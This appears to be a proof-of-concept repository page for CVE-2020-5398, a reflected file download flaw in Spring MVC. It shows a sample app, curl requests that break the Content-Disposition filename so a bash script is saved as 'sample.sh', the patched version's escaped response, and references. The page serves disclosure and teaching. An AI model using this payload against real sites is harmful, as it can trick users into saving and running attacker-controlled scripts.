Related vulnerability
Title: VMware Spring Framework cross-site scripting vulnerability (CVE-2020-5398). Description: VMware Spring Framework is an open-source Java / Java EE application framework from VMware (US) that helps developers build high-quality applications. Pivotal Software Spring Framework 5.2.x before 5.2.3, 5.1.x before 5.1.13 and 5.0.x before 5.0.16 contain a vulnerability catalogued as cross-site scripting; the actual issue, as the README below demonstrates, is that user-supplied input is reflected unescaped into the filename attribute of a `Content-Disposition` header. A remote attacker can exploit it by mounting a reflected file download (RFD) attack, which the catalogue entry describes as leading to disclosure of sensitive information.
Description
CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC
Introduction
# CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC
> In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a “Content-Disposition” header in the response where the filename attribute is derived from user supplied input.
## Usage
1. Start the sample application:
```
./gradlew bootRun
```
It listens on `127.0.0.1:8080`.
2. Request a download. Both the `filename` and the `contents` query parameters are reflected into the response, `filename` into the `Content-Disposition` header (with `.txt` appended) and `contents` into the body:
```
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT
Hello, World
```
A browser saves this response as a download named `sample.txt`.
## PoC
### Insecure Version (Spring Web 5.2.2)
```
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT
#!/bin/bash
id
```
The browser saves the download as `sample.sh` (a shell script): the URL-decoded query value `sample.sh";` contains an unescaped `"`, which terminates the quoted filename early, so the `;.txt` that follows is discarded and the attacker-controlled body (`#!/bin/bash` / `id`) lands on disk under an attacker-chosen name and extension.
### Secure Version (Spring Web 5.2.3)
```
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT
#!/bin/bash
id
```
Start download `sample.sh";.txt` file.(Text file)
## References
- [CVE-2020-5398: RFD Attack via "Content-Disposition" Header Sourced from Request Input by Spring MVC or Spring WebFlux Application | Security | Pivotal](https://pivotal.io/security/cve-2020-5398)
- [NVD - CVE-2020-5398](https://nvd.nist.gov/vuln/detail/CVE-2020-5398)
- What is an RFD attack?
  - [eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf](https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf)
  - [Reflected File Download - OWASP](https://wiki.owasp.org/index.php/Reflected_File_Download)
- Fix commit
  - [ContentDisposition refactoring · spring-projects/spring-framework@956ffe6](https://github.com/spring-projects/spring-framework/commit/956ffe68587c8d5f21135b5ce4650af0c2dea933)
File snapshot
[4.0K] /data/pocs/27718de8d31e2aea7a1ce63c10fb1d9463dd1e88
├── [ 939] build.gradle
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 55K] gradle-wrapper.jar
│ └── [ 232] gradle-wrapper.properties
├── [5.2K] gradlew
├── [2.2K] gradlew.bat
├── [1.0K] LICENSE.md
├── [2.3K] README.md
├── [ 393] settings.gradle
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] example
│ │ └── [4.0K] cve_2020_5398
│ │ ├── [4.0K] controller
│ │ │ └── [1.6K] MainController.java
│ │ └── [ 328] Cve20205398Application.java
│ └── [4.0K] resources
│ └── [ 1] application.properties
└── [4.0K] test
└── [4.0K] java
└── [4.0K] com
└── [4.0K] example
└── [4.0K] cve_2020_5398
└── [ 222] Cve20205398ApplicationTests.java
15 directories, 12 files